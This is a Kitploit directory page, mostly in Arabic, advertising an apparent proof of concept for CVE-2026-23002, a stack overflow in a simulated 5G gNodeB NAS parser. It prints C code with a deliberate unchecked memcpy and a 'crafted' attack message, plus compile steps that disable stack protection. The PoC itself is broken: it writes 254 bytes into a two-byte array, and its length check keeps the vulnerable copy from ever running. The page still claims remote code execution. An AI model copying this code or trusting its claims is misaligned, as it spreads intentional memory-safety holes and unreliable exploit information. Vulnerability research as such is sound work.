Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23002-5G-NAS-Message-Buffer-Overflow-in-gNodeB — محاكي محلل NAS لعقدة gNodeB في شبكات 5G مع إثبات مفهوم (PoC) لثغرة تجاوز سعة المخزن المؤقت للمكدس (stack buffer overflow) في CVE-2026-23002؛ رسالة NAS مصممة بعناية تؤدي إلى تنفيذ كود عن بُعد. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-23002-5g-nas-message-buffer-overflow-in-gnodeb
أمان الأنظمة المدمجةتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاستغلال الملفات الثنائية
GitHubgeorge0papasotiriou/cve-2026-23002-5g-nas-message-buffer-overflow-in-gnodeb

CVE-2026-23002-5G-NAS-Message-Buffer-Overflow-in-gNodeB

محاكي محلل NAS لعقدة gNodeB في شبكات 5G مع إثبات مفهوم (PoC) لثغرة تجاوز سعة المخزن المؤقت للمكدس (stack buffer overflow) في CVE-2026-23002؛ رسالة NAS مصممة بعناية تؤدي إلى تنفيذ كود عن بُعد.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 15 أياملم تتم المراجعة بعد

CVE-2026-23002 – تجاوز سعة المخزن المؤقت لرسائل 5G NAS في gNodeB

كود البرنامج (محاكاة بلغة C)

root@kitploit:~
// gnb_nas_sim.c - Simulated 5G gNodeB parsing NAS Registration Request
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define MAX_IE_SIZE 128

void process_registration_request(uint8_t *nas_msg, uint16_t length) {
    uint8_t ie_buffer[MAX_IE_SIZE];
    // Read IE length from message; if length > MAX_IE_SIZE, buffer overflow
    uint16_t ie_length = (nas_msg[0] << 8) | nas_msg[1];
    if (ie_length > 0 && ie_length <= length - 2) {
        memcpy(ie_buffer, nas_msg + 2, ie_length); // no bounds check!
        printf("IE copied, size %d\n", ie_length);
    }
}

int main() {
    // Craft a NAS message with an oversized IE length
    uint8_t attack[] = {0x01, 0x00}; // IE length = 256, but buffer is only 128 bytes
    // Append padding to make length consistent
    memset(attack+2, 'A', 254);
    process_registration_request(attack, sizeof(attack));
    return 0;
}

CVE-2026-23002 – تجاوز سعة المخزن المؤقت لرسائل 5G NAS في gNodeB

Severity: Critical

نظرة عامة

محلّل Non‑Access Stratum (NAS) الخاص بالجيل الخامس في gNodeB محاكى لا يتحقق من حقل طول عنصر المعلومات. يمكن للمهاجم الذي يرسل طلب تسجيل مصممًا بعناية أن يتسبب في تجاوز سعة مخزن مؤقت مكدسي (stack buffer)، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد على المحطة الأساسية.

تفاصيل الثغرة

  • النوع: تجاوز سعة المخزن المؤقت المكدسي (Stack Buffer Overflow)
  • الأثر: اختراق كامل للمحطة الأساسية وتعطيل الشبكة.
  • السبب الجذري: يُؤتمَن طول عنصر المعلومات في NAS دون التحقق من الحدود مقابل حجم المخزن المؤقت الوجهة.

توضيح الاستغلال

قم بتجميع وتشغيل المحلل المعرّض للثغرة:

root@kitploit:~
gcc -o gnb_nas_sim gnb_nas_sim.c -fno-stack-protector
./gnb_nas_sim

يتعطل البرنامج بخطأ تجزئة (Segmentation Fault) نتيجة تلف المكدس (Stack Corruption).

تنزيل الأداة